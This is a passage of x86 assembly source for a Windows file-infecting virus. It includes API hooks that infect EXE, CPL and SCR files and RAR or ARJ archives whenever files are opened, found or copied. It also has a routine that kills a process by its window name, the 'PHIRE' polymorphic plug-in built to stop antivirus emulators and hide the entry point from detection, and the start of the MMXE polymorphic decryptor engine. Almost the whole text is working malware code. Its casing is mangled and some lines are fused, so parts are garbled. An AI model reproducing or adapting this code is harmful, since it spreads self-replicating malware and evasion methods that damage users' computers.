XCHG EAX, ESI; ESI = PTR 2 Ordinal; Eax = 0Lodsw; Get Ordinal In AX
Cwde; Clear MSW of Eax
SHL Eax, 2; and with it we go to the
Add Eax, DWORD PTR [EBP AddResStableva]; AddresStable (Array of
XCHG ESI, EAX; DWORDS)
Lodsd; Get Address of API RVA
Add Eax, [EBP TMPMODULEBASE]; and Normalize !! That's it!
RET
GetApi_Et_Crc32 ENDP
Input:
EAX = Number to align
ECX = Alignment Factor
Output:
EAX = aligned Number
;
Align Proc
Push Edx
XOR EDX, EDX
Push EAX
Div ECX
POP EAX
SUB ECX, EDX
Add Eax, ECX
POP EDX
RET
Align ENDP
Input:
ECX = Offset Where Truncate
Output:
Nothing.
;
Truncfile Proc
XOR EAX, EAX
Push EAX
Push EAX
Push ECX
Push DWORD PTR [EBP FILEHANDLE]
Apicall_setfilepointer
Push DWORD PTR [EBP FILEHANDLE]
Apicall_SETENDOFFILE
RET
Truncfile ENDP
Input:
ESI = Pointer to the file where open
Output:
EAX = Handle / Invalid_Handle_Value
OpenFile Proc
XOR EAX, EAX
Push EAX
Push EAX
Push 00000003H
Push EAX
INC EAX
Push EAX
Push 80000000h OR 40000000H
PUSH ESI
Apicall_createfilea
RET
OpenFile Endp
Input:
ECX = Size to Map
Output:
EAX = mapping handle / error
CreateMap Proc
XOR EAX, EAX
Push EAX
Push ECX
Push EAX
Push 00000004H
Push EAX
Push DWORD PTR [EBP FILEHANDLE]
Apicall_createfilemappinga
RET
CreateMap ENDP
Input:
ECX = Size to Map
Output:
EAX = mapping address / error
;
MapFile Proc
XOR EAX, EAX
Push ECX
Push EAX
Push EAX
Push 00000002H
Push DWORD PTR [EBP MAPHANDLE]
Apicall_mapviewoffile
RET
MapFile Endp
Input:
EDI = Pointer to the name of the window of the process we want to kill
Output:
Nothing
;
TerminateProc Procxor EBX, EBX; ThNX 2 Bennyg0d :)
Push EDI
Push EBX
Apicall_findWindowa
XCHG EAX, ECX
Jecxz TP_ERROREXIT
Push EBX
Push EBX
Push 00000012H
Push ECX
Apicall_PostMessagea
Test Al, 00h
Org $ -1
TP_ERROREXIT:
STC
RET
TERMINATEPROC ENDP
Input:
ESI = Pointer to the code to process
EDI = Size of Such Code
Output:
EAX = CRC32 of That Code
;
CRC32 PROC
CLD
XOR ECX, ECX; Optimized by me - 2 bytes
DEC ECX; Less
MOV EDX, ECX
Push EBX
Nextbytecrc:
XOR EAX, EAX
XOR EBX, EBX
Lodsb
XOR Al, Cl
MOV CL, CH
MOV CH, DL
MOV DL, DH
MOV DH, 8
NextbitCrc:
SHR BX, 1
RCR AX, 1
JNC NOCRC
XOR AX, 08320H
XOR bx, 0edb8h
NOCRC: DEC DH
JNZ nextbitCrc
XOR ECX, EAX
XOR EDX, EBX
Dec Edi; Another Fool Byte Less
Jnz nextbytecrc
POP EBX
Not Edx
NOT ECX
MOV EAX, EDX
ROL EAX, 16
MOV AX, CX
RET
CRC32 ENDP
Input:
; ESI = Offset Where Check for MZ Mark
Output:
Cf = set if fail, Clear IF All OK.
;
Checkmz Proc
Pushhad
Call CMZ_SetSeh
MOV ESP, [ESP 08H]
JMP CMZ_EXIT
CMZ_SETSEH:
XOR EDX, EDX
Push DWORD PTR FS: [EDX]
MOV FS: [EDX], ESP
CMP Word PTR [ESI], "ZM"
JNZ CMZ_EXIT
Test Al, 00h
Org $ -1
CMZ_EXIT:
STC
Push 00h; ThanX 2 Super for Pointing
POP EDX; ME A BUG Here :)
POP DWORD PTR FS: [EDX]
POP EDX
Popad
RET
Checkmz endp
Input:
; TOS 00 = Return Address
; TOS 04 = size of what we want to know the checksum
; TOS 08 = Address Where Begin to Calculate Checksum
Output:
EAX = Checksum
;
Checksum Proc Pascal LPFILE: DWORD, DWFILEN: DWORD
XOR EDX, EDX
Mov ESI, LPFILE
MOV ECX, DWFilelen
SHR ECX, 1
@CSUMLOOP:
Movzx Eax, Word PTR [ESI]
Add Edx, EAX
MOV EAX, EDX
Movzx EDX, DX
SHR EAX, 10h
Add Edx, EAX
Inc Esiinc ESI
Loop @csumloop
MOV EAX, EDX
SHR EAX, 10h
Add Ax, DX
Add Eax, DWFilelen
RET
Checksum ENDP
Input:
EDI = Where generate the 6 char string
Output:
Nothing.
;
GenerateName Proc
Push 6; Generate In [EDI] a 6 char
POP ECX; Name
GCL00P: Call Genchar
Stosb
LOOP GCL00P
RET
Genchar:
Call Random; Generate Letter Between
And Al, 25D; A and Z:]
Add Al, 41H
RET
GenerateName Endp
Input:
; Eax = crc32 of the api we want to get info
Output:
EAX = API Address
EBX = API IN import TABLE
GetApi_it_Crc32 Proc
MOV DWORD PTR [EBP TEMPGA_IT1], EAX
MOV ESI, DWORD PTR [EBP ImageBase]
Add ESI, 3CH
Lodsw
CWDE
Add Eax, DWORD PTR [EBP ImageBase]
XCHG ESI, EAX
Lodsd
CMP EAX, "EP"
JNZ NOPES
Add ESI, 7CH
Lodsd
Push EAX
Lodsd
MOV ECX, EAX
POP ESI
Add ESI, DWORD PTR [EBP ImageBase]
Searchk32:
PUSH ESI
MOV ESI, [ESI 0CH]
Add ESI, DWORD PTR [EBP ImageBase]
Lea EDI, [EBP K32_DLL]
MOV ECX, K32_SIZE
CLD
Push ECX
REP CMPSB
POP ECX
POP ESI
JZ Gotcha
Add ESI, 14H
JMP Searchk32
Gotcha:
CMP Byte PTR [ESI], 00H
JZ NOPES
Mov EDX, [ESI 10h]
Add Edx, DWORD PTR [EBP ImageBase]
Lodsd
OR EAX, EAX
JZ NOPES
XCHG EDX, EAX
Add Edx, [EBP ImageBase]
XOR EBX, EBX
LOOPY:
CMP DWORD PTR [EDX 00h], 00H
JZ NOPES
CMP BYTE PTR [EDX 03H], 80H
JZ Reloop
Mov Edi, [EDX]
Add Edi, DWORD PTR [EBP ImageBase]
Inc EDI
Inc EDI
MOV ESI, EDI
Pushhad
EOSZ_EDI
Sub EDI, ESI
Call CRC32
MOV [ESP.PUSHAD_ECX], EAX
Popad
CMP DWORD PTR [EBP TEMPGA_IT1], ECX
JZ Wegotit
Reloop:
Inc EBX
Add EDX, 4
Loop LopY
Wegotit:
SHL EBX, 2
Add Ebx, EAX
MOV EAX, [EBX]
Test Al, 00h
Org $ -1
NOPES:
STC
RET
GetApi_it_Crc32 ENDP
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []; || THREAD Used for hook it desired Apis (per-process residence) ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
THRPERPROCESS Proc Pascal Delta_thread: DWORD
MOV EBP, DELTA_THREAD
XOR ECX, ECX
TPP_SLEP:
Mov Cl, Thread_sleeping
TPP_SEMAPHORE EQU $ -1
JECXZ TPP_SLEP
Pushhad
Call tpp_setupseh
MOV ESP, [ESP 08H]
JMP TPP_RESTORESEHH
TPP_SETUPSEH:
XOR EDX, EDX
Push DWORD PTR FS: [EDX]
MOV FS: [EDX], ESP
Call Ienc_Decrypt
DD 00000000h
DD EBLOCKD-blockdd
Blockd label Byte
Call getk32
Push EAX
POP DWORD PTR [EBP TMPMODULEBASE]
Lea ESI, [EBP @@ hookz]
@@ hooker:
CLC
Lodsd
PUSH ESI
Call getApi_it_Crc32
POP ESI
JNC @@ hookshit
MOV EAX, [ESI-4]
Push EDI ESI
Call getapi_et_crc32
POP EDI ESI
Add Edi, 04H
Stosd
XCHG EDI, ESI
JMP @@ checkshit
@@ hookshit:
XCHG EAX, ECX
Lodsd
Add Eax, EBP
MOV [EBX], EAX
XCHG EAX, ECX
XCHG ESI, EDI
Stosd
XCHG ESI, EDI
@@ checkshit:
CMP Byte PTR [ESI], BILLY_BEL
JNZ @@ hooker
Eblockd label byte
TPP_RESTORESEH:
XOR EDX, EDX
POP DWORD PTR FS: [EDX]
POP EDX
Popad
AND Byte PTR [EBP TPP_SEMAPHORE], Thread_sleeping
JMP EXITTHREAD
THRPERPROCESS ENDP
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
; || Hooked API's Handlerz ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
Hookmovefilea:
Call dohookstuff
JMP DWORD PTR [EAX HMOVEFILEA]
HookcopyFilea:
Call dohookstuff
JMP DWORD PTR [EAX HCopyfilea]
HookgetFullPathnamea:
Call dohookstuff
JMP DWORD PTR [EAX HGETFULLLPATHNAMEA]
HookDeletefilea:
Call dohookstuff
JMP DWORD PTR [EAX HDeletefilea] hookwinexec:
Call dohookstuff
JMP DWORD PTR [EAX Hwinexec]
HookcreateFilea:
Call dohookstuff
JMP DWORD PTR [EAX HCREATEFILEA]
HookcreateProcessa:
Call dohookstuff
JMP DWORD PTR [EAX HCREATEPROCESSA]
HookgetFileAttributesa:
Call dohookstuff
JMP DWORD PTR [EAX HGETFILEATTRIBUTESA]
HooksetFileAttributesa:
Call dohookstuff
JMP DWORD PTR [EAX HSETFILEATTRIBUTESA]
HOOK_LOPEN:
Call dohookstuff
JMP DWORD PTR [EAX H_LOPEN]
Hookmovefileexa:
Call dohookstuff
JMP DWORD PTR [EAX HMOVEFILEXA]
HookcopyFileExa:
Call dohookstuff
JMP DWORD PTR [EAX HCopyFileExa]
HookOpenfile:
Call dohookstuff
JMP DWORD PTR [EAX Hopenfile]
HookgetProcaddress:
Pushad; save all the registers
Call Ienc_Decrypt
DD 00000000h
DD EBLOCKE-Blocke
Blocke label Byte
Call getdeltaoffset; ebp = delta offset
MOV EAX, [ESP 24h]; EAX = Base Address of Module
CMP EAX, DWORD PTR [EBP KERNEL]; Is EAX = K32?
Jnz OriginalGPa; if Not, IT's Not Our Problem
MOV [ESP.PUSHAD_EAX], EBP; Store Delta Offset
Popad
Pop DWORD PTR [EAX HGPA_RETADDRESS]; PUT RET Address in A Safe
; Place
Call DWORD PTR [EAX HGETPROCADDRESS]; CALL Original API
OR EAX, EAX; Fail? duh!
JZ HGPA_SEEYA
Pushhad
XCHG EAX, EBX; EBX = Address of Function
Call getdeltaoffset; ebp = delta offset
MOV ECX, NHOOKEDAPIS; ECX = Number of Hoot API
Lea ESI, [EBP @@ hookz 08h]; ESI = PTR TO Array Of API
Addresses
XOR EDX, EDX; EDX = Counter (Set to 0)
HGPA_ISHOKABLEAPI ?:
Lodsd; eax = address of a hooded API
CMP EBX, EAX; Is Equal To Requested Address?
JZ HGPA_INDEEDITITISI; if Yes, IT's INTERESTING 4 US
Add ESI, 08H; Get Ptr To Another OneInc EDX; Increase Counter
Loop HGPA_ISHOKABLEAPI?; Search Loop
JMP OriginalGPax
HGPa_indeeditis:
Lea ESI, [EBP @@ hookz 04h]
Imul Eax, EDX, 0CH; MULTIPLY PER 12
Add ESI, Eax; Get The Correct Offset
Lodsd; and get the value
Add Eax, EBP; Adjust It To Delta
MOV [ESP.PUSHAD_EAX], EAX
Popad; EAX = HOOKED API Address
Eblocke Label Byte
HGPa_seeya:
Push 12345678H
HGPA_RETDRESS EQU $ -4
RET
OriginalGPax:
MOV [ESP.PUSHAD_EAX], EBP; this is a jump to the Origi-
Popad; nal getprocaddress
Push DWORD PTR [EAX HGPA_RETADDRESS]
JMP DWORD PTR [EAX HGETPROCADDRESS]
OriginalGPA:
MOV [ESP.PUSHAD_EAX], EBP; this is a jump to the Origi-
Popad; nal getprocaddress
JMP DWORD PTR [EAX HGETPROCADDRESS]
Hookfindfirstfilea:
Pushad; Save All Reggies
Call Ienc_Decrypt
DD 00000000h
DD EBLOCKF-Blockf
Blockf label byte
Call getdeltaoffset; ebp = delta offset
MOV Eax, [ESP 20H]; EAX = RETURN Address
MOV DWORD PTR [EBP FFRETADDRESS], EAX
MOV Eax, [ESP 28H]; EAX = Ptr To Wfd
MOV DWORD PTR [EBP FF_WFD], EAX
Mov [ESP.PUSHAD_EAX], EBP; Save Delta Offset
Popad
Add ESP, 4; Remove this Ret Address from
Stack
Call DWORD PTR [EAX HFINDFIRSTFILEA]; CALL Original API
INC EAX
JZ _FF_GoAway
Dec EAX
JMP Twisted
_FF_GoAway:
Dec EAX
JMP FF_GoAway
Twisted:
Pushad; save reggies and flaggies
Pushfd
Call getdeltaoffset; delta again
Movzx EBX, Byte PTR [EBP WFD_Handles_Count]; Number of Active Hndlers
MOV EDX, [EBP WFD_HNDINMEM]; Our Handle Table In Mem
Eblockf label byte
Mov ESI, 12345678H; PTR to FileName
FF_WFD EQU $ -4
Add ESI, (Offset WFD_SZFILENAME-OFFSET WIN32_FIND_DATA)
CMP EBX, N_HANDLES; OVER MAX HND Storing? Jae AvoidStoring; Shit ...
MOV DWORD PTR [EDX EBX * 8], EAX; Store Handle
MOV DWORD PTR [EDX EBX * 8 4], ESI; Store WFD Offset
Inc Byte PTR [EBP WFD_Handles_Count]
AvoidStoring:
PUSH ESI
Call Check4validFile; Is A Reliable File 4 INF?
POP EDI
JECXZ FF_AVOIDINFEKT; duh!
Dec ECX
JECXZ FF_INFPE
Call Infectorchiveedi
JMP FF_AVOIDINFEKT
FF_INFPE:
Call Infectedi; Infect IT
FF_AVOIDINFEKT:
POPFD
Popad
FF_Goaway:; return to caller
Push 12345678H
FFretaddress EQU $ -4
RET
HookfindNextFilea:
Pushad; Save All Reggies
Call Ienc_Decrypt
DD 00000000h
DD EBLOCK10-Block10
Block10 label byte
Call getDeltaoffset; Get Delta Offset
MOV Eax, [ESP 20H]; EAX = RETURN Address
MOV DWORD PTR [EBP Fnretaddress], EAX
MOV EAX, [ESP 24h]; EAX = Search Handle
MOV DWORD PTR [EBP FN_HND], EAX
Mov [ESP.PUSHAD_EAX], EBP; Save Delta Offset
Popad
Add ESP, 4; FIX Stack
Call DWORD PTR [EAX _FINDNEXTFILEA]; Call ORIGINAL API
OR EAX, EAX; Fail? DAMN.
JZ Fn_Goaway
Pushad; save regs and flags
Pushfd
Call getDeltaoffset; Get Delta Again
EBLOCK10 Label Byte
Mov Eax, 12345678h; Eax = Search Handle
Fn_HND EQU $ -4
Call Check4validhandle; Is in Our Table? if Yes,
JC Fn_avoidinfekt; infect.
XCHG ESI, ESI; ESI = Pointer to WFD
Add ESI, (Offset WFD_SZFILENAME-OFFSET WIN32_FIND_DATA)
Push ESI; ESI = PTR to FileName
Call Check4validFile; Is Reliable ITS INF.?
POP EDI
JECXZ FN_AVOIDINFEKT; DUH ...
Dec ECX
JECXZ FN_INFPE
Call Infectorchiveedi
JMP FN_AVOIDINFEKT
FN_INFPE:
Call Infectedi; Infect it!
Fn_avoidinfekt:
POPFD; Restore Flags & Regs
Popad
FN_Goaway:; return to caller
Push 12345678H
Fnretaddress EQU $ -4Ret
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
; || Standard API Handler ||
[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []
DOHOOKSTUFF:
Call Ienc_Decrypt
DD 00000000h
DD EBLOCK11-Block11
Block11 label byte
Pushhad
Pushfd
Call getDeltaoffset
MOV EDX, [ESP 2CH]; Get FileName to Infect
MOV ESI, EDX
Call Check4validfile
Jecxz errordohookstuff
XCHG EDI, EDX
Dec ECX
Jecxz Infectwithhookstuff
Infectanarchive:
Call Infectorchiveedi
JMP errordohookstuff
Infectwithhookstuff:
Call infectedi
ErrorDohookstuff:
POPFD; Preserve All As if nothing
Popad; happed :)
Push EBP
Call getDeltaoffset; Get Delta Offset
XCHG EAX, EBP
POP EBP
RET
Eblock11 label byte
Input:
ESI = Pointer to File to Check
Output:
ECX = 0 -> NOT VALID FILE
; ECX = 1 -> Possible PE file
ECX = 2 -> Possible Archive
;
Check4validfile:
XOR ECX, ECX
Lodsb
OR Al, Al; FIND NULL? SHIT ...
JZ C4VF_ERROR
CMP Al, "."; DOT FOUND? INTERESTING ...
Jnz Check4validFile
Dec ESI
Lodsd; Put Extension in Eax
OR Eax, 20202020h; make string locase
NOT EAX
CMP EAX, NOT "EXE."; Is IT An EXE? Infect !!!
JZ C4VF_SUCCCESSFUL
CMP EAX, NOT "LPC."; Is IT A CPL? Infect !!!
JZ C4VF_SUCCCESSFUL
CMP EAX, NOT "RCS."; Is IT A SCR? Infect !!!
JZ C4VF_SUCCCESSFUL
CMP EAX, NOT "RAR."; Is IT A RAR? Infect !!!
JZ C4VF_SUCCESSFULARCHIVE
CMP EAX, NOT "JRA."; Is IT An Arj? Infect !!!
JZ C4VF_SUCCESSFULARCHIVE
C4VF_ERROR:
RET
C4VF_SUCCESSFULARCHIVE:
Inc ECX
C4VF_Successful:
Inc ECX
RET
Input:
Nothing.
Output:
EBP = DELTA OFFSET
;
GetDeltaoffset:
Call @ x1
@ x1: pop ebpsub EBP, OFFSET @ x1
RET
Input:
EAX = Handle
Output:
EAX = Wfd Offset of Given Handle
; Edx = Places What IT OCCUPIES in WFD_Handles Structure
; Cf = set to 1 if it's found, to 0 if IT WASN '
;
Check4validHandle:
XOR EDX, EDX
MOV EDI, [EBP WFD_HNDINMEM]
C4VH_L00P:
CMP EDX, N_HANDLES; OVER LIMITS? SHIT ...
JAE C4VH_ERROR
CMP EAX, [EDX * 8 EDI]; EAX = a Handler Stored in
JZ C4VH_Successful; TABLE
Inc EDX; Increase Counter
JMP C4VH_L00P
C4VH_SUCCESSFUL:
MOV EAX, [EDX * 8 EDI 4]; EAX = Wfd Offset
Test Al, 00h
Org $ -1
C4VH_ERROR:
STC
RET
=: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: = : =: =: =: =: =: =: =: =: =: =: =: =: =
[PHIRE] - POLYMORPHIC HEADER IDIOT RANDOM ENGINE V1.00? MMXE PLUG-IN?
=: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: = : =: =: =: =: =: =: =: =: =: =: =: =: =
;
THIS is a plat-in for mmxe v1.01, what is able to generate a polymorphic
Block of code (size defined by user) Captable to Kill Emulators and Hide
The real entrypoint from av. this is an ePO plug-in for my mmxe. why i say
IT's a plug-in? Well, IT Wouldn't Work without MMXE, And It Adds Features
To That Engine That It Previously Haven't. so, don't doubt it: it's a platg-
; in;)
;
Phire Will Generate Some Code Like The Following:
;
[...]
; Call @@ 1
[...]
; MOV ESP, [ESP 08H]
[...]
Pop DWORD PTR FS: [0000H]
[...]; add esp, 4
[...]
JMP mmxe_decryptor
[...]
; @@ 1: push dword ptr fs: [0000H]
[...]
; MOV DWORD PTR FS: [0000H], ESP
[...]
; * -> from here until complete the 256 bytes of code, We'll Fill this
WITH RANDOM DATA, SO An Exception Will Surely Happen :)
;
(Each '[...]' means garbage code. This will be placed at the Original Entry-
Point of the infected file, and stops all the actual emulators. so, this
Plug-in makes the Virus to be Undetectable Heuristical.
;
Input:
; EDI = Buffer Where Put the generated polymorphic code
EAX = Distance Between Host Entry-Point and Virus Entry-Point
EBP = DELTA OFFSET
Output:
Nothing.
;
All registers are preserved.
;
PLIMIT EQU 100H
PHIRE PROC
Pushhad
Call Ienc_Decrypt
DD 00000000h
DD EBLOCK12-Block12
Block12 label byte
MOV DWORD PTR [EBP @@ p_buffer], EDI
MOV DWORD PTR [EBP @@ p_distance], EAX
Push Edi; Clear Work Area
XOR EAX, EAX
Mov ECX, PLIMIT
Rep Stosb
POP EDI
And DWORD PTR [EBP @@reg_key], 00h; CLEAR ALL Registers :)
Call @@ clean_mask
AND BYTE PTR [EBP @@ init_mmx?], 00H; Don't Allow MMX Garbage
Call @@ gen_garbage
MOV Al, 0e8h; Write the Provisional Call
Stosb
XOR EAX, EAX
Stosd
MOV DWORD PTR [EBP @@ p_tmp_call], EDI
Call @@ gen_garbage
Mov Eax, @@ s_stack_fix; generate some Similar Code
Call R_Range; To MoV ESP, [ESP 08H]
Lea EBX, [EBP @@ stack_fix]
MOV EAX, [EBX EAX * 4]
Add Eax, EBP
Call EAX
Call @@ gen_garbage
MOV EAX, @@ s_seh_restore; Generate SomeciLA
Call R_Range; To Pop Fs: [0000H]
Lea EBX, [EBP @@ seh_restore]
MOV EAX, [EBX EAX * 4] Add Eax, EBP
Call EAX
Call @@ gen_garbage
MOV Eax, @@ s_stack_fix_nh; generate some similar code
Call R_Range; To Add ESP, 4
Lea EBX, [EBP @@ stack_fix_nh]
MOV EAX, [EBX EAX * 4]
Add Eax, EBP
Call EAX
Call @@ gen_garbage
Call @@jump_to_decryptor; generate the jump to the
Decryptor
Call @@ gen_garbage
MOV EBX, EDI; Call After SEH HANDLER
MOV EAX, DWORD PTR [EBP @@ p_tmp_call]
SUB EBX, EAX
MOV [EAX-4], EBX
Call @@ gen_garbage
MOV Eax, @@ s_seh_saveold; generate some Similar Code
Call r_range; to push fs: [0000H]
Lea EBX, [EBP @@ seh_save_old]
MOV EAX, [EBX EAX * 4]
Add Eax, EBP
Call EAX
Call @@ gen_garbage
MOV Eax, @@ s_seh_newhnd; Generate Somilar Code
Call R_Range; To Mov FS: [0000H], ESP
Lea EBX, [EBP @@ seh_newhnd]
MOV EAX, [EBX EAX * 4]
Add Eax, EBP
Call EAX
Call @@ gen_garbage
Mov Eax, Plimit
MOV ECX, DWORD PTR [EBP @@ p_buffer]
MOV EBX, EDI
SUB EBX, ECX
Sub Eax, EBX
XCHG ECX, EAX
@@ Fill_L00P:
Call Random
Stosb
Loop @@ Fill_L00P
Popad
RET
DB 00H, "[PHIRE V1.00]", 00h
@@choose_aux1_reg:
Mov Eax, 08h
Call R_Range
OR EAX, EAX
JZ @@choose_aux1_reg
CMP Eax, _esp
JZ @@choose_aux1_reg
CMP Al, Byte PTR [EBP @@reg_aux2]
JZ @@choose_aux1_reg
MOV BYTE PTR [EBP @@reg_aux1], al
RET
@@choose_aux2_reg:
Mov Eax, 08h
Call R_Range
OR EAX, EAX
JZ @@choose_aux2_reg
CMP Eax, _esp
JZ @@choose_aux2_reg
CMP AL, BYTE PTR [EBP @@reg_aux1]
JZ @@choose_aux2_reg
MOV BYTE PTR [EBP @@reg_aux2], Al
RET
Generate the Jump to the mmxe decryptor @@ jump_to_decryptor:
Mov al, 0e9h
Stosb
XOR EAX, EAX
Stosd
MOV EBX, EDI
SUB EBX, DWORD PTR [EBP @@ p_buffer]
MOV EAX, DWORD PTR [EBP @@ p_distance]
Sub Eax, EBX
Mov DWORD PTR [EDI-4], EAX
RET
; ----
FIXING Stack After Fault - Type 1:
; MOV ESP, [ESP 08H]
@@ stack_fix_type1:
Mov Eax, 0824648BH
Stosd
RET
FIXING Stack After Fault - Type 2:
; MOV REG, ESP
Mov ESP, [REG 08H]
@@ stack_fix_type2:
MOV Al, 08BH
Stosb
Call @@choose_aux1_reg
SHL EAX, 3
OR Al, 11000100B
Stosb
Call @@ gen_garbage
MOV AX, 608BH
OR AH, BYTE PTR [EBP @@ reg_aux1]
Stosw
MOV Al, 08H
Stosb
And byte PTR [EBP @@reg_aux1], 00H
RET
Fixing Stack After Fault - Type 3:
Mov REG, [ESP 08H]
; MOV ESP, REG
@@ stack_fix_type3:
MOV Al, 8BH
Stosb
Call @@choose_aux1_reg
SHL EAX, 3
OR Al, 01000100B
Stosb
MOV AX, 0824H
Stosw
Call @@ gen_garbage
MOV Al, 08BH
Stosb
MOV Al, Byte Ptr [EBP @@ reg_aux1]
OR Al, 11100000B
Stosb
And byte PTR [EBP @@reg_aux1], 00H
RET
Fixing Stack After Fault - Type 4:
Mov Reg1, ESP
Mov reg2, [reg1 08h]
; MOV ESP, REG2
@@ stack_fix_type4:
MOV Al, 08BH
Stosb
Call @@choose_aux1_reg
SHL EAX, 3
OR Al, 11000100B
Stosb
Call @@ gen_garbage
Call @@choose_aux2_reg
MOV AX, 408BH
OR AH, BYTE PTR [EBP @@ reg_aux1]
Movzx EBX, Byte Ptr [EBP @@ reg_aux2]
SHL EBX, 3
OR AH, BL
Stosw
MOV Al, 08H
Stosb
Call @@ gen_garbage
MOV Al, 08BH
Stosb
Mov Al, Byte Ptr [EBP @@ reg_aux2]
OR Al, 11100000B
Stosb
And byte PTR [EBP @@reg_aux1], 00H
And Byte Ptr [EBP @@reg_aux2], 00hret
; ----
Restoring Old SEH HANDLER - TYPE 1:
Pop DWORD PTR FS: [0000H]
@@ SEH_RESTORE_OLD_TYPE1:
Mov Eax, 068F6467H
Stosd
XOR EAX, EAX
Stosw
RET
Restoring Old SEH HANDLER - TYPE 2:
Zero REG
Pop DWORD PTR FS: [REG]
@@ SEH_RESTORE_OLD_TYPE2:
Call @@choose_aux1_reg
CMP Al, _ebp
JZ @@ seh_restore_old_type2
Call @@ gen_zero_reg
Call @@ gen_garbage
MOV AX, 08F64H
Stosw
MOV Al, Byte Ptr [EBP @@ reg_aux1]
Stosb
And byte PTR [EBP @@reg_aux1], 00H
RET
; ----
FIXING Stack Because New Handler - Type 1:
Pop REG
@@ stack_fix_nh_type1:
Call @@choose_aux1_reg
Add Al, 58h
Stosb
And byte PTR [EBP @@reg_aux1], 00H
RET
Fixing Stack Because New Handler - Type 2:
; EQ. Add ESP, 4
@@ stack_fix_nh_type2:
MOV BYTE PTR [EBP @@ reg_aux1], _ ESP
Call @@ge_incpointer
And byte PTR [EBP @@reg_aux1], 00H
RET
; ----
Saving Old SEH HANDLER - TYPE 1:
Push DWORD PTR FS: [0000H]
@@ SEH_SAVE_OLD_TYPE1:
Mov Eax, 36FF6467H
Stosd
XOR EAX, EAX
Stosw
RET
Saving Old SEH HANDLER - TYPE 2:
Zero REG
Push DWORD PTR FS: [REG]
@@ SEH_SAVE_OLD_TYPE2:
Call @@choose_aux1_reg
CMP Al, _ebp
JZ @@ seh_save_old_type2
Call @@ gen_zero_reg
Call @@ gen_garbage
MOV AX, 0FF64H
Stosw
MOV Al, Byte Ptr [EBP @@ reg_aux1]
OR Al, 00110000B
Stosb
And byte PTR [EBP @@reg_aux1], 00H
RET
Saving Old SEH HANDAL - TYPE 3:
; MOV REG, DWORD PTR FS: [0000H]
Push REG
@@ SEH_SAVE_OLD_TYPE3:
Call @@choose_aux1_reg
Mov Eax, 008B6467H
Stosd
Dec Edi
MOV Al, Byte PTR [EBP @@reg_aux1] shl Eax, 3
OR Al, 00000110B
Stosb
XOR EAX, EAX
Stosw
Call @@ gen_garbage
MOV Al, Byte Ptr [EBP @@ reg_aux1]
Add Al, 50h
Stosb
And byte PTR [EBP @@reg_aux1], 00H
RET
Saving Old SEH HANDLER - TYPE 4:
Zero Reg1
Mov Reg2, DWORD PTR fs: [reg1]
Push Reg2
@@ SEH_SAVE_OLD_TYPE4:
Call @@choose_aux1_reg
CMP Al, _ebp
JZ @@ seh_save_old_type4
Call @@ gen_zero_reg
Call @@ gen_garbage
MOV AX, 8B64H
Stosw
Call @@choose_aux2_reg
SHL EAX, 3
OR Al, Byte PTR [EBP @@ reg_aux1]
Stosb
Call @@ gen_garbage
Mov Al, Byte Ptr [EBP @@ reg_aux2]
Add Al, 50h
Stosb
And byte PTR [EBP @@reg_aux1], 00H
And byte PTR [EBP @@reg_aux2], 00H
RET
; ----
Set New SEH HANDLER TYPE 1:
MOV FS: [0000H], ESP
@@ SEH_Newhnd_Type1:
Mov Eax, 26896467H
Stosd
XOR EAX, EAX
Stosw
RET
Set New SEH HANDLER TYPE 2:
Zero REG
MOV FS: [REG], ESP
@@ SEH_Newhnd_type2:
Call @@choose_aux1_reg
CMP Al, _ebp
JZ @@ seh_newhnd_type2
Call @@ gen_zero_reg
Call @@ gen_garbage
MOV AX, 8964H
Stosw
MOV Al, Byte Ptr [EBP @@ reg_aux1]
OR Al, 00100000B
Stosb
And byte PTR [EBP @@reg_aux1], 00H
RET
TABLES for a Random Construction of SEH Trick for Stop Emulatorz
@@ stack_fix label byte
DD Offset (@@ stack_fix_type1)
DD offset (@@ stack_fix_type2)
DD Offset (@@ stack_fix_type3)
DD offset (@@ stack_fix_type4)
@@ s_stack_fix equ ($ -offset @@ stack_fix) / 4)
@@ SEH_RESTORE LABEL BYTE
DD Offset (@@ seh_restore_old_type1)
DD Offset (@@ seh_restore_old_type2) @@ s_seh_restore EQU ($ -offset @@ seh_restore) / 4)
@@ stack_fix_nh label byte
DD Offset (@@ stack_fix_nh_type1)
DD offset (@@ stack_fix_nh_type2)
@@ s_stack_fix_nh EQU (($ -offset @@ stack_fix_nh) / 4)
@@ seh_save_old label byte
DD Offset (@@ seh_save_old_type1)
DD Offset (@@ seh_save_old_type2)
DD Offset (@@ seh_save_old_type3)
DD offset (@@ seh_save_old_type4)
@@ s_seh_saveold EQU ($ -Offset @@ seh_save_old) / 4)
@@ seh_newhnd label byte
DD offset (@@ seh_newhnd_type1)
DD Offset (@@ seh_newhnd_type2)
@@ s_seh_newhnd EQU ($ -offset @@ seh_newhnd) / 4)
Phire endp
EBLOCK12 Label Byte
=: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: = : =: =: =: =: =: =: =: =: =: =: =: =: =
[Mmxe] - MultiMedia Extensions Engine v1.01
=: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: =: = : =: =: =: =: =: =: =: =: =: =: =: =: =
;
This is a bugfixed and improduved version of my mmxe v1.00. Enjoy it!
; Ps: of course, this Engine Is So Far Away from Mental Driller's Code, But
; at Least it Tries To Be Poly, Huh? :)
;
Well, The Poly Decryptor Generated with MMXE WILL BE AS One ONE:
;
; -------------------
; | Mmx detection |???
; ----------------- ?
; | Mmx decryptor |? [If not mmx detected]
; -----------------
; | Non mmx decryptor |; ----------------- }
; |}
; | Virus body |} [this is the encrypted part :)]]
; |}
